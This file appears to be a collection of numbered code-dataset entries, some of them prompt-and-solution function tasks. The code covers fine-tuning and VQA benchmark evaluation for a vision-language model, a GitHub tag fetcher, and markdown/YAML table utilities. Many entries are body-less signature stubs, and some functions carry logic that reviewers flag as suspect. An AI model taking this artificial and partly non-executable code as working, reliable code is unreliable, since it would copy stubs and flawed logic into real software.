def safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str, bias="none"):
def make_supervised_data_module(
tokenizer: transformers.PreTrainedTokenizer, data_args, max_len,
) -> Dict:
def print_trainable_params(model: torch.nn.Module):
import numpy as np
import random
class MonkeyLMHeadModel(QWenLMHeadModel):
def __init__(self, config):
class QWenTokenizer(PreTrainedTokenizer):
def __init__(
self,
vocab_file,
errors="replace",
image_start_tag='<img>',
image_end_tag='</img>',
image_pad_tag='<imgpad>',
ref_start_tag='<ref>',
ref_end_tag='</ref>',
box_start_tag='<box>',
box_end_tag='</box>',
quad_start_tag='<quad>',
quad_end_tag='</quad>',
**kwargs,
):
def __getstate__(self):
def __setstate__(self, state):
def __len__(self) -> int:
def get_vocab(self) -> Dict[bytes, int]:
def convert_tokens_to_ids(
self, tokens: Union[bytes, str, List[Union[bytes, str]]]
) -> List[int]:
def _add_tokens(self, new_tokens: Union[List[str], List[AddedToken]], special_tokens: bool = False) -> int:
def save_vocabulary(self, save_directory: str, **kwargs) -> Tuple[str]:
def tokenize(
self,
text: str,
allowed_special: Union[Set, str] = "all",
disallowed_special: Union[Collection, str] = (),
**kwargs,
) -> List[Union[bytes, str]]:
def _encode_imgurl(img_tokens):
def convert_tokens_to_string(self, tokens: List[Union[bytes, str]]) -> str:
def vocab_size(self):
def _convert_id_to_token(self, index: int) -> Union[bytes, str]:
def _convert_token_to_id(self, token: Union[bytes, str]) -> int:
def _tokenize(self, text: str, **kwargs):
def _decode(
self,
token_ids: Union[int, List[int]],
skip_special_tokens: bool = False,
errors: str = None,
**kwargs,
) -> str:
def _decode_imgurl(img_token_ids):
def to_list_format(self, text: str):
def _encode_vl_info(tokens):
def from_list_format(self, list_format: List[Dict]):
def _fetch_latest_picture(self, response, history):
def _fetch_all_box_with_ref(self, text):
def draw_bbox_on_latest_picture(
self,
response,
history=None,
) -> Optional[Image.Image]:
class MonkeyConfig(PretrainedConfig):
def __init__(
self,
vocab_size=151936,
hidden_size=4096,
num_hidden_layers=32,
num_attention_heads=32,
emb_dropout_prob=0.0,
attn_dropout_prob=0.0,
layer_norm_epsilon=1e-6,
initializer_range=0.02,
max_position_embeddings=8192,
scale_attn_weights=True,
use_cache=True,
bf16=False,
fp16=False,
fp32=False,
kv_channels=128,
rotary_pct=1.0,
rotary_emb_base=10000,
use_dynamic_ntk=True,
use_logn_attn=True,
use_flash_attn="auto",
intermediate_size=22016,
no_bias=True,
tie_word_embeddings=False,
**kwargs,
):
def train():
    """Fine-tune the Monkey model, optionally with LoRA / Q-LoRA.

    Parses CLI dataclasses, loads config/model/tokenizer, freezes or adapts
    parameters according to the LoRA settings, builds the supervised data
    module and runs the HF Trainer, saving the (LoRA-aware) final state.
    """
    global local_rank

    parser = transformers.HfArgumentParser(
        (ModelArguments, DataArguments, TrainingArguments, LoraArguments)
    )
    (
        model_args,
        data_args,
        training_args,
        lora_args,
    ) = parser.parse_args_into_dataclasses()

    # DeepSpeed + Q-LoRA requires forcing the accelerate distributed type.
    if getattr(training_args, 'deepspeed', None) and getattr(lora_args, 'q_lora', False):
        training_args.distributed_state.distributed_type = DistributedType.DEEPSPEED

    # NOTE(review): compute_dtype is derived but not used below — confirm
    # whether it should be forwarded to from_pretrained(torch_dtype=...).
    compute_dtype = (
        torch.float16
        if training_args.fp16
        else (torch.bfloat16 if training_args.bf16 else torch.float32)
    )

    local_rank = training_args.local_rank

    device_map = None
    world_size = int(os.environ.get("WORLD_SIZE", 1))
    ddp = world_size != 1
    if lora_args.q_lora:
        # Pin each DDP rank's shards to its own device.
        device_map = {"": int(os.environ.get("LOCAL_RANK") or 0)} if ddp else None
        if len(training_args.fsdp) > 0 or deepspeed.is_deepspeed_zero3_enabled():
            # BUGFIX: message previously read "are not incompatible",
            # inverting its meaning.
            logging.warning(
                "FSDP or ZeRO3 are incompatible with QLoRA."
            )

    # Set RoPE scaling factor
    config = MonkeyConfig.from_pretrained(
        "monkey_model",
        cache_dir=training_args.cache_dir,
        trust_remote_code=True,
    )
    rank0_print(config)
    # KV cache is useless during training and wastes memory.
    config.use_cache = False

    # Load model and tokenizer
    rank0_print("loading base model")
    model = MonkeyLMHeadModel.from_pretrained(
        model_args.model_name_or_path,
        config=config,
        cache_dir=training_args.cache_dir,
        device_map=device_map,
        trust_remote_code=True,
        quantization_config=GPTQConfig(
            bits=4, disable_exllama=True
        )
        if training_args.use_lora and lora_args.q_lora
        else None,
    )

    tokenizer = QWenTokenizer.from_pretrained(
        "monkey_model",
        cache_dir=training_args.cache_dir,
        model_max_length=training_args.model_max_length,
        padding_side="right",
        use_fast=False,
        trust_remote_code=True,
    )
    tokenizer.pad_token_id = tokenizer.eod_id

    if not training_args.use_lora:
        # Full fine-tune: optionally freeze the vision tower except its
        # attention pooler, and keep any LoRA-named params trainable.
        if training_args.fix_vit and hasattr(model, 'transformer') and hasattr(model.transformer, 'visual'):
            model.transformer.visual.requires_grad_(False)
            if hasattr(model.transformer.visual, 'attn_pool'):
                model.transformer.visual.attn_pool.requires_grad_(True)
        for k, v in model.named_parameters():
            if "lora" in k:
                v.requires_grad_(True)

    if training_args.use_lora:
        if lora_args.q_lora or "chat" in model_args.model_name_or_path.lower():
            modules_to_save = None
        else:
            # Intentionally empty: no extra modules saved alongside adapters.
            modules_to_save = []
        lora_config = LoraConfig(
            r=lora_args.lora_r,
            lora_alpha=lora_args.lora_alpha,
            target_modules=lora_args.lora_target_modules,
            lora_dropout=lora_args.lora_dropout,
            bias=lora_args.lora_bias,
            task_type="CAUSAL_LM",
            modules_to_save=modules_to_save  # This argument serves for adding new tokens.
        )
        model = get_peft_model(model, lora_config)

        if training_args.gradient_checkpointing:
            model.enable_input_require_grads()

    print_trainable_params(model)

    # Load data
    data_module = make_supervised_data_module(
        tokenizer=tokenizer, data_args=data_args, max_len=training_args.model_max_length
    )

    # Start trainner
    trainer = Trainer(
        model=model, tokenizer=tokenizer, args=training_args, **data_module
    )

    trainer.train()
    trainer.save_state()

    safe_save_model_for_hf_trainer(trainer=trainer, output_dir=training_args.output_dir, bias=lora_args.lora_bias)
3,774 | from dataclasses import dataclass, field
import json
import math
import logging
import os
from typing import Dict, Optional, List
import torch
from torch.utils.data import Dataset
from deepspeed import zero
from deepspeed.runtime.zero.partition_parameters import ZeroParamStatus
import transformers
from transformers import Trainer, GPTQConfig, deepspeed
from transformers.trainer_pt_utils import LabelSmoother
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from accelerate.utils import DistributedType
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
from monkey_model.configuration_monkey import MonkeyConfig
import numpy as np
import random
def setup_seed(seed):
    """Seed every relevant RNG (python, numpy, torch CPU/CUDA, hash) for reproducibility."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    # cuDNN determinism knobs intentionally left disabled, as in the original:
    # torch.backends.cudnn.deterministic = True
    # torch.backends.cudnn.benchmark = False
    os.environ["PYTHONHASHSEED"] = str(seed)
3,775 | import argparse
import itertools
import json
import os
import random
import time
from functools import partial
from typing import Optional
import sys
import torch
from tqdm import tqdm
from vqa import VQA
from vqa_eval import VQAEval
from monkey_model.modeling_monkey import MonkeyLMHeadModel
from monkey_model.tokenization_qwen import QWenTokenizer
import numpy as np
from pathlib import Path
# Benchmark registry: dataset key -> file paths and evaluation config.
# Per entry:
#   train/test          - jsonl annotation paths ('train' may be empty for test-only sets)
#   question/annotation - official VQA toolkit files (only for 'vqa_score' datasets)
#   metric              - one of: anls, relaxed_accuracy, accuracy, vqa_score
#   max_new_tokens      - generation budget used by evaluate()
ds_collections = {
    'estvqa_test': {
        'train': 'data/ESTVQA/estvqa.jsonl',
        # NOTE(review): directory casing differs from 'train' ('estvqa' vs 'ESTVQA')
        # - confirm which path exists on disk.
        'test': 'data/estvqa/estvqa.jsonl',
        'metric': 'anls',
        'max_new_tokens': 100,
    },
    'docvqa_test': {
        'train': 'data/docvqa/train.jsonl',
        'test': 'data/docvqa/test_ans.jsonl',
        'metric': 'anls',
        'max_new_tokens': 100,
    },
    'chartqa': {
        'train': 'data/chartqa/train_augmented.jsonl',
        'test': 'data/chartqa/chartqa.jsonl',
        'metric': 'relaxed_accuracy',
        'max_new_tokens': 100,
    },
    'infovqa_test': {
        'train': 'data/infographicVQA/infovqa.jsonl',
        'test': 'data/infographicVQA/infovqa_test.jsonl',
        'metric': 'anls',
        'max_new_tokens': 100,
    },
    'vizwiz_val': {
        'train': 'data/vizwiz/vizwiz_train.jsonl',
        'test': 'data/vizwiz/vizwiz_val.jsonl',
        'question': 'data/vizwiz/vizwiz_val_questions.json',
        'annotation': 'data/vizwiz/vizwiz_val_annotations.json',
        'metric': 'vqa_score',
        'max_new_tokens': 10,
    },
    'deepform': {
        'train': '',
        'test': 'data/test_DeepForm.jsonl',
        'metric': 'accuracy',
        'max_new_tokens': 100,
    },
    'KLC': {
        'train': '',
        'test': 'data/test_KleisterCharity.jsonl',
        'metric': 'accuracy',
        'max_new_tokens': 100,
    },
    'WTQ': {
        'train': '',
        'test': 'data/test_WikiTableQuestions.jsonl',
        'metric': 'accuracy',
        'max_new_tokens': 100,
    },
    'gqa_testdev': {
        'train': 'data/gqa/train.jsonl',
        'test': 'data/gqa/gqa_testdev_new.json',
        'metric': 'accuracy',
        'max_new_tokens': 10,
    },
    'okvqa_val': {
        'train': 'data/okvqa/okvqa_train.jsonl',
        'test': 'data/okvqa/okvqa_val.jsonl',
        'question': 'data/okvqa/OpenEnded_mscoco_val2014_questions.json',
        'annotation': 'data/okvqa/mscoco_val2014_annotations.json',
        'metric': 'vqa_score',
        'max_new_tokens': 10,
    },
    'textvqa_val': {
        'train': 'data/textvqa/textvqa_train.jsonl',
        'test': 'data/textvqa/textvqa_val.jsonl',
        'question': 'data/textvqa/textvqa_val_questions.json',
        'annotation': 'data/textvqa/textvqa_val_annotations.json',
        'metric': 'vqa_score',
        'max_new_tokens': 10,
    },
    'stvqa_test': {
        'train': 'data/STVQA/stvqa.jsonl',
        'test': 'data/STVQA/stvqa.jsonl',
        'metric': 'anls',
        'max_new_tokens': 100,
    },
    'ai2diagram_test': {
        'train': 'data/ai2d/train.jsonl',
        'test': 'data/ai2d/test.jsonl',
        'metric': 'accuracy',
        'max_new_tokens': 10,
    },
    'vqav2_val': {
        'train': 'data/vqav2/vqav2_train.jsonl',
        'test': 'data/vqav2/vqav2_val.jsonl',
        'question': 'data/vqav2/v2_OpenEnded_mscoco_val2014_questions.json',
        'annotation': 'data/vqav2/v2_mscoco_val2014_annotations.json',
        'metric': 'vqa_score',
        'max_new_tokens': 10,
    },
}
# NOTE(review): everything from here to evaluate() below is a set of
# signature-only stubs (defs/classes with no bodies) - apparently an outline
# of the helpers used by evaluate(). This is not executable Python as written;
# the real implementations live elsewhere (e.g. vqa.py / vqa_eval.py).
def evaluateANLS(ans_list):
def evaluate_relaxed_accuracy(entries):
def evaluate_exact_match_accuracy(entries):
def collate_fn(batches, tokenizer):
class VQADataset(torch.utils.data.Dataset):
    def __init__(self, train, test, prompt, few_shot):
    def __len__(self):
    def __getitem__(self, idx):
class InferenceSampler(torch.utils.data.sampler.Sampler):
    def __init__(self, size):
    def _get_local_indices(total_size, world_size, rank):
    def __iter__(self):
    def __len__(self):
class VQA:
    def __init__(self, annotation_file=None, question_file=None):
    def createIndex(self):
    def info(self):
    def getQuesIds(self, imgIds=[], quesTypes=[], ansTypes=[]):
    def getImgIds(self, quesIds=[], quesTypes=[], ansTypes=[]):
    def loadQA(self, ids=[]):
    def showQA(self, anns):
    def loadRes(self, resFile, quesFile):
class VQAEval:
    def __init__(self, vqa=None, vqaRes=None, n=2):
    def evaluate(self, quesIds=None):
    def processPunctuation(self, inText):
    def processDigitArticle(self, inText):
    def setAccuracy(self, accQA, accQuesType, accAnsType):
    def setEvalQA(self, quesId, acc):
    def setEvalQuesType(self, quesId, quesType, acc):
    def setEvalAnsType(self, quesId, ansType, acc):
    def updateProgress(self, progress):
def evaluate(model,tokenizer,prompt,args,dataset_name):
    """Distributed evaluation of *model* on one benchmark from ds_collections.

    Every rank generates answers for its shard of the test split; all
    predictions are gathered on every rank, then rank 0 writes
    result/<args.save_name>/<dataset_name>.json and scores them with the
    metric configured for the dataset.

    Parameters
    ----------
    model : a generation-capable model; inputs are moved to CUDA here
    tokenizer : tokenizer exposing eod_id and decode()
    prompt : prompt template forwarded to VQADataset
    args : namespace with few_shot, batch_size, num_workers, save_name
    dataset_name : key into ds_collections
    """
    dataset_info = ds_collections[dataset_name]
    dataset = VQADataset(
        train=dataset_info['train'],
        test=dataset_info['test'],
        prompt=prompt,
        few_shot=args.few_shot,
    )
    len_dataset = len(dataset)
    if torch.distributed.get_rank() == 0:
        print(f"there have {len(dataset)} in {dataset_name}")
    # InferenceSampler shards the dataset across ranks (one disjoint slice each).
    dataloader = torch.utils.data.DataLoader(
        dataset=dataset,
        sampler=InferenceSampler(len_dataset),
        batch_size=args.batch_size,
        num_workers=args.num_workers,
        pin_memory=True,
        drop_last=False,
        collate_fn=partial(collate_fn, tokenizer=tokenizer),
    )
    outputs = []
    for image_paths,question_ids, input_ids, attention_mask,annotations in tqdm(dataloader):
        # Greedy decoding; the eod token doubles as pad and eos.
        pred = model.generate(
            input_ids=input_ids.cuda(),
            attention_mask=attention_mask.cuda(),
            do_sample=False,
            num_beams=1,
            max_new_tokens=dataset_info['max_new_tokens'],
            min_new_tokens=1,
            length_penalty=1,
            num_return_sequences=1,
            output_hidden_states=True,
            use_cache=True,
            pad_token_id=tokenizer.eod_id,
            eos_token_id=tokenizer.eod_id,
        )
        # Drop the prompt tokens; keep only the newly generated answer text.
        answers = [
            tokenizer.decode(_[input_ids.size(1):].cpu(),
                             skip_special_tokens=True).strip() for _ in pred
        ]
        # One record per sample; the key layout matches what the downstream
        # scorer for each dataset family expects.
        for image_path,question_id, answer, annotation in zip(image_paths,question_ids, answers,
                                                              annotations):
            if dataset_name in ['vqav2_val', 'okvqa_val', 'textvqa_val', 'vizwiz_val']:
                outputs.append({
                    'image_path':image_path,
                    'question_id': question_id,
                    'answer': answer,
                })
            elif dataset_name in ['docvqa_test', 'gqa_testdev',"stvqa_test","infovqa_test"]:
                outputs.append({
                    'image_path':image_path,
                    'questionId': question_id,
                    'answer': answer,
                    'annotation': annotation,
                })
            elif dataset_name in ['ai2diagram_test',"WTQ","deepform","KLC"]:
                outputs.append({
                    'image_path':image_path,
                    'image': question_id,
                    'answer': answer,
                    'annotation': annotation,
                })
            elif dataset_name in ['estvqa_test']:
                outputs.append({
                    'image_path':image_path,
                    'questionId': question_id,
                    'answer': answer,
                    'annotation': [annotation],
                })
            elif dataset_name in ["chartqa"]:
                outputs.append({
                    'image_path':image_path,
                    'answer': answer,
                    'annotation': annotation,
                })
            else:
                raise NotImplementedError
    torch.distributed.barrier()
    # Gather every rank's outputs (JSON round-trip keeps the payload simple
    # to serialize), then flatten into a single list.
    world_size = torch.distributed.get_world_size()
    merged_outputs = [None for _ in range(world_size)]
    torch.distributed.all_gather_object(merged_outputs, json.dumps(outputs))
    merged_outputs = [json.loads(_) for _ in merged_outputs]
    merged_outputs = [_ for _ in itertools.chain.from_iterable(merged_outputs)]
    # File output and scoring happen on rank 0 only.
    if torch.distributed.get_rank() == 0:
        print(f"Evaluating {dataset_name} ...")
        results_file = f'{dataset_name}.json'
        root_path = os.path.join("result",args.save_name)
        Path(root_path).mkdir(exist_ok=True,parents=True)
        results_file = os.path.join(root_path,results_file)
        json.dump(merged_outputs, open(results_file, 'w',encoding="utf-8"), ensure_ascii=False,indent=2)
        if dataset_info['metric'] == 'vqa_score':
            # Official VQA accuracy via the VQA/VQAEval toolkit.
            vqa = VQA(dataset_info['annotation'],dataset_info['question'])
            results = vqa.loadRes(
                resFile=results_file,
                quesFile=dataset_info['question'])
            vqa_scorer = VQAEval(vqa, results, n=2)
            question_id_list = [item["question_id"]for item in merged_outputs]
            vqa_scorer.evaluate(question_id_list)
            print(vqa_scorer.accuracy)
            results_file = results_file.replace("json","txt")
            with open(results_file,"w") as fp:
                fp.write(dataset_name+"\n")
                fp.writelines(str(vqa_scorer.accuracy["overall"])+'\n')
        elif dataset_info['metric'] == 'anls':
            # Overwrites the indented dump above with a compact one.
            json.dump(merged_outputs,
                      open(results_file, 'w'),
                      ensure_ascii=False)
            anls_res = evaluateANLS(merged_outputs)
            print(anls_res)
            results_file = results_file.replace("json","txt")
            with open(results_file,"w") as fp:
                fp.write(dataset_name+"\n")
                fp.writelines(str(anls_res)+'\n')
        elif dataset_info['metric'] == 'relaxed_accuracy':
            print({
                'relaxed_accuracy': evaluate_relaxed_accuracy(merged_outputs)
            })
            results_file = results_file.replace("json","txt")
            with open(results_file,"w") as fp:
                fp.write(dataset_name+"\n")
                fp.writelines(str(evaluate_relaxed_accuracy(merged_outputs))+'\n')
        elif dataset_info['metric'] == 'accuracy':
            if 'gqa' in dataset_name:
                # GQA answers are normalized: keep the first clause and strip
                # leading articles/copulas before exact-match scoring.
                for entry in merged_outputs:
                    response = entry['answer']
                    response = response.strip().split('.')[0].split(
                        ',')[0].split('!')[0].lower()
                    if 'is ' in response:
                        response = response.split('is ')[1]
                    if 'are ' in response:
                        response = response.split('are ')[1]
                    if 'a ' in response:
                        response = response.split('a ')[1]
                    if 'an ' in response:
                        response = response.split('an ')[1]
                    if 'the ' in response:
                        response = response.split('the ')[1]
                    if ' of' in response:
                        response = response.split(' of')[0]
                    response = response.strip()
                    entry['answer'] = response
            acc = evaluate_exact_match_accuracy(merged_outputs)
            print({'accuracy': acc})
            results_file = results_file.replace("json","txt")
            with open(results_file,"w") as fp:
                fp.write(dataset_name+"\n")
                fp.writelines(str(acc)+'\n')
    torch.distributed.barrier()
3,776 | import re
import requests
import time
from datetime import datetime
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
# GitHub API auth header; replace the placeholder with a real token
# before running, otherwise requests are unauthenticated/rejected.
headers = {"Authorization": "INPUT YOUR KEY"}
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
def get_latest_version_number(owner, repo):
    """Return the name of the most recent tag of *owner*/*repo* on GitHub.

    Queries the /repos/{owner}/{repo}/tags endpoint (assumes the API returns
    tags newest-first - TODO confirm). Returns None when the repository has
    no tags; raises requests.HTTPError on a non-2xx response.
    """
    url = f"https://api.github.com/repos/{owner}/{repo}/tags"
    # timeout prevents the script from hanging forever on a stalled connection
    response = requests.get(url, headers=headers, timeout=30)
    response.raise_for_status()
    tags = response.json()
    if not tags:
        return None
    print(f"Got latest version number for {owner}/{repo}: {tags[0]['name']}")
    return tags[0]["name"]
3,777 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `read_mdfile` function. Write a Python function `def read_mdfile(md_file: str)` to solve the following problem:
Read markdown file
Here is the function:
def read_mdfile(md_file: str):
    """Return the full text of a markdown file, decoded as UTF-8."""
    with open(md_file, encoding="utf-8") as handle:
        return handle.read()
3,778 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `write_mdfile` function. Write a Python function `def write_mdfile(md_file: str, md_str: str)` to solve the following problem:
Write markdown file
Here is the function:
def write_mdfile(md_file: str, md_str: str):
    """Persist *md_str* to *md_file* as UTF-8 text (overwrites)."""
    with open(md_file, mode="w", encoding="utf-8") as handle:
        handle.write(md_str)
3,779 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `read_yaml` function. Write a Python function `def read_yaml(yaml_file)` to solve the following problem:
Read yaml file
Here is the function:
def read_yaml(yaml_file):
    """Load and return the parsed contents of a YAML file (FullLoader)."""
    with open(yaml_file, mode="r", encoding="utf-8") as handle:
        parsed = yaml.load(handle, Loader=yaml.FullLoader)
    return parsed
3,780 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `write_yaml` function. Write a Python function `def write_yaml(yaml_file, data)` to solve the following problem:
Write yaml file
Here is the function:
def write_yaml(yaml_file, data):
    """Dump *data* to *yaml_file*, preserving key order and unicode characters."""
    with open(yaml_file, mode="w", encoding="utf-8") as handle:
        yaml.dump(data, handle, allow_unicode=True, sort_keys=False)
3,781 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `replace_content` function. Write a Python function `def replace_content(src: str, content: str, start_comment: str, end_comment: str)` to solve the following problem:
Replace content between start and end comment
Here is the function:
def replace_content(src: str, content: str, start_comment: str, end_comment: str):
    """Replace the text between *start_comment* and *end_comment* in *src*.

    The markers themselves are kept; *content* is inserted between them,
    padded with blank lines. If the marker pair is not found, a warning is
    printed and *src* is returned unchanged.
    """
    # Escape the markers so regex metacharacters in them (e.g. '(', '+')
    # are matched literally instead of corrupting the pattern.
    pattern = f"{re.escape(start_comment)}[\\s\\S]+{re.escape(end_comment)}"
    repl = f"{start_comment}\n\n{content}\n\n{end_comment}"
    if re.search(pattern, src) is None:
        print(
            f"can not find comment in src, please check it, it should be {start_comment} and {end_comment}"
        )
    # Use a callable replacement so backslashes / group references inside
    # *content* are inserted verbatim rather than interpreted by re.sub.
    return re.sub(pattern, lambda _m: repl, src)
3,782 | import subprocess
import yaml
import os
import re
def get_substr_before(src: str, split_str: str):
    """Return the part of *src* preceding the first *split_str* (whole string if absent)."""
    pos = src.find(split_str)
    return src if pos == -1 else src[:pos]
def get_substr_after(src: str, split_str: str):
    """Return the part of *src* following the first *split_str* (whole string if absent)."""
    pos = src.find(split_str)
    return src if pos == -1 else src[pos + len(split_str):]
def parse_header(header_str: str):
    """Normalize a table-header cell into a yaml key: lowercase, '_' for spaces, ';' removed."""
    key = header_str.strip().lower()
    return key.replace(" ", "_").replace(";", "")
The provided code snippet includes necessary dependencies for implementing the `mdtable_to_yaml` function. Write a Python function `def mdtable_to_yaml(table_content: str, md_ref: dict)` to solve the following problem:
Convert markdown table to yaml
Here is the function:
def mdtable_to_yaml(table_content: str, md_ref: dict):
    """Convert a markdown table to a yaml-friendly dict.

    Returns (data, md_ref): *data* has keys "header" (alias -> original
    header text), "length" (alias -> separator-line width) and "body"
    (list of row dicts keyed by alias). "tldr" cells are rewritten to
    "abbr: content" using *md_ref* (footnote abbr -> content), and
    "materials" cells are parsed into {LINK_TEXT_UPPER: url} dicts.
    """
    # parse table to list of cell lists (only lines starting with "|")
    table_list = []
    for line in table_content.splitlines():
        if line.startswith("|"): # skip empty line
            table_list.append(line.strip("|").strip().split("|"))
    # check table exist
    if len(table_list) == 0:
        return {}, md_ref
    # get table header and body
    table_header = table_list[0] # header
    table_line = table_list[1] # line length (the |---|---| separator row)
    table_body = table_list[2:] # body
    header_alias = {}
    for i, header in enumerate(table_header):
        # parse header to yaml key (column index -> normalized key)
        header_alias[i] = parse_header(header)
    # parse table body to dict
    data = {}
    data["header"] = {}
    for i, header in enumerate(table_header):
        # save header (original text, keyed by alias)
        data["header"][header_alias[i]] = header
    data["length"] = {}
    for i, line in enumerate(table_line):
        # count and save line length (dash count, used to re-render later)
        data["length"][header_alias[i]] = len(line.strip())
    data["body"] = []
    for line in table_body:
        line_dict = {}
        for i, item in enumerate(line):
            if header_alias[i] == "tldr" and len(item.strip()) > 0:
                # special handle for tldr
                # abbr[^abbr] -> abbr || " " -> "-" || "+" -> "plus"
                abbr = (
                    item.strip()
                    .split("[")[0]
                    .strip()
                    .replace(" ", "-")
                    .replace("+", "plus")
                )
                if not abbr in md_ref:
                    # can not find abbr in md_ref
                    print(f"can not find {abbr} in md_ref")
                    # default value
                    md_ref[abbr] = "TBC"
                # save content as "abbr: content"
                line_dict[header_alias[i]] = f"{abbr}: {md_ref[abbr]}"
                continue
            if header_alias[i] == "materials":
                # special handle for materials
                # get links in materials
                get_links = re.findall(r"\[.*?\]\(.*?\)", item.strip())
                links = {}
                for link in get_links:
                    # parse link to dict, split by "]("
                    # [[link]](url) || [[link](url)] || [link](url) -> {link: url}
                    text = get_substr_before(link, "](").strip("[]").strip()
                    url = get_substr_after(link, "](").strip(")").strip()
                    # to upper case
                    links[text.upper()] = url
                line_dict[header_alias[i]] = links
                continue
            # other cases: plain text cell
            line_dict[header_alias[i]] = item.strip()
        data["body"].append(line_dict)
    return data, md_ref
3,783 | import subprocess
import yaml
import os
import re
def get_substr_before(src: str, split_str: str):
    """Return everything before the first occurrence of *split_str* (or all of *src*)."""
    # str.partition leaves *src* unchanged in the head slot when the
    # separator is absent, matching the original find() == -1 fallback.
    return src.partition(split_str)[0]
def get_substr_after(src: str, split_str: str):
    """Return everything after the first occurrence of *split_str* (or all of *src*)."""
    head, sep, tail = src.partition(split_str)
    # When the separator is absent, the original returns src unchanged.
    return tail if sep else src
The provided code snippet includes necessary dependencies for implementing the `yaml_to_mdtable` function. Write a Python function `def yaml_to_mdtable(yaml_data: dict, md_ref: str)` to solve the following problem:
Convert yaml to markdown table
Here is the function:
def yaml_to_mdtable(yaml_data: dict, md_ref: str):
    """Convert yaml table data back to a markdown table string.

    Returns (table_markdown, md_ref) where *md_ref* is a string that
    accumulates footnote definition lines ("[^abbr]: content") extracted
    from the cells.
    """
    # check yaml data exist
    if len(yaml_data) == 0:
        return "", md_ref
    # get table header and body
    table_header = yaml_data["header"] # header
    table_line = yaml_data["length"] # line length
    table_body = yaml_data["body"] # body
    # parse table body to dict
    table_list = []
    # header row
    table_list.append("|" + "|".join(table_header.values()) + "|")
    # separator row, widths restored from the recorded lengths
    table_list.append(
        "| " + " | ".join(["-" * line for line in table_line.values()]) + " |"
    )
    for line in table_body:
        # remove tldr
        if "tldr" in line:
            line.pop("tldr")
        for key in table_header.keys():
            if key == "tldr":
                continue
            # NOTE(review): the abbr/footnote handling below runs for every
            # non-tldr column even though the comment calls it the tldr
            # special case, and cells without ":" are emptied. This looks
            # suspicious - confirm the intended table layout before relying
            # on it.
            # special handle for tldr
            # split by first ":"
            abbr = get_substr_before(line[key], ":").strip()
            if len(abbr) > 0:
                # save abbr to md_ref
                md_ref += f"[^{abbr}]: {get_substr_after(line[key], ':').strip()}\n"
                # revert "plus" to "+"
                line[key] = f"{abbr.replace('plus', '+')}[^{abbr}]"
            else:
                # empty abbr
                line[key] = ""
            if key == "materials":
                # special handle for materials
                links = []
                if type(line[key]) is not dict:
                    # wrong type
                    print(f"materials is str, please check it: {line[key]}")
                else:
                    # parse dict to str
                    for text, url in line[key].items():
                        links.append(f"[[{text}]({url})]")
                    line[key] = " ".join(links)
        # other cases
        table_list.append("| " + " | ".join(line.values()) + " |")
    return "\n".join(table_list), md_ref
3,784 | import subprocess
import yaml
import os
import re
def get_substr_before(src: str, split_str: str):
    """Return the prefix of *src* up to the first *split_str*, or *src* itself when absent."""
    where = src.find(split_str)
    if where < 0:
        return src
    return src[:where]
def get_substr_after(src: str, split_str: str):
    """Return the suffix of *src* after the first *split_str*, or *src* itself when absent."""
    where = src.find(split_str)
    if where < 0:
        return src
    return src[where + len(split_str):]
def get_content(src: str, start_comment: str, end_comment: str):
    """Return the first span of *src* from *start_comment* through *end_comment*, inclusive.

    Prints a warning when the marker pair is absent; in that case the
    subsequent .group() call raises AttributeError, matching the original
    failure mode.
    """
    pattern = f"{start_comment}[\\s\\S]+{end_comment}"
    # Search once instead of twice (the original ran re.search for the check
    # and again for the result).
    match = re.search(pattern, src)
    if match is None:
        print(
            f"can not find comment in src, please check it, it should be {start_comment} and {end_comment}"
        )
    return match.group(0)
The provided code snippet includes necessary dependencies for implementing the `get_mdref` function. Write a Python function `def get_mdref(md_str: str, start_comment: str, end_comment: str)` to solve the following problem:
Get md ref from md_str
Here is the function:
def get_mdref(md_str: str, start_comment: str, end_comment: str):
    """Parse markdown footnote definitions between the two marker comments.

    Returns {normalized_abbr: content} built from every "[^abbr]: content"
    line found inside the marked region of *md_str*. Abbreviations are
    normalized (no ^/[], spaces -> '-', '+' -> 'plus'); empty contents fall
    back to "TBC" with a printed warning.
    """
    ref_content = get_content(md_str, start_comment, end_comment)
    ref_dict = {}
    for line in ref_content.splitlines():
        # skip empty line (only footnote lines start with "[")
        if line.startswith("["):
            # get abbr and content
            # [^abbr]: content -> {abbr: content}
            # abbr: " " -> "-" || "+" -> "plus" || "^" -> "" || "[]" -> ""
            # split by first "]:"
            abbr = (
                get_substr_before(line, "]:")
                .strip("[]")
                .replace("^", "")
                .strip()
                .replace(" ", "-")
                .replace("+", "plus")
            )
            # split by first "]:"
            cont = get_substr_after(line, "]:").strip()
            if len(cont) == 0:
                # empty content
                print(f"can not find content for {abbr}")
                # default value
                cont = "TBC"
            ref_dict[abbr] = cont
    return ref_dict
3,785 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `write_mdref` function. Write a Python function `def write_mdref(md_ref: dict)` to solve the following problem:
Write md ref to README.md
Here is the function:
def write_mdref(md_ref: dict):
    """Render an {abbr: content} mapping as newline-joined markdown footnote definitions."""
    return "\n".join(
        f"[^{abbr}]: {content}" for abbr, content in md_ref.items()
    )
3,786 | import subprocess
import yaml
import os
import re
The provided code snippet includes necessary dependencies for implementing the `get_git_log_time` function. Write a Python function `def get_git_log_time(file_path: str)` to solve the following problem:
Get git log time
Here is the function:
def get_git_log_time(file_path: str):
    """Return the ISO date of the last git commit touching *file_path*.

    Equivalent to ``git log -1 --format=%cd --date=iso <file_path>``.
    Raises subprocess.CalledProcessError if git exits non-zero.
    """
    # Pass arguments as a list (shell=False) so a file path containing shell
    # metacharacters cannot be interpreted by the shell (injection-safe).
    cmd = ["git", "log", "-1", "--format=%cd", "--date=iso", file_path]
    resp = subprocess.check_output(cmd)
    return resp.decode("utf-8").strip()
3,787 | import pandas as pd
import os
import re
import datetime
import time
import pytz
import requests
import ssl
import urllib.parse
import OpenSSL
from dateutil import parser
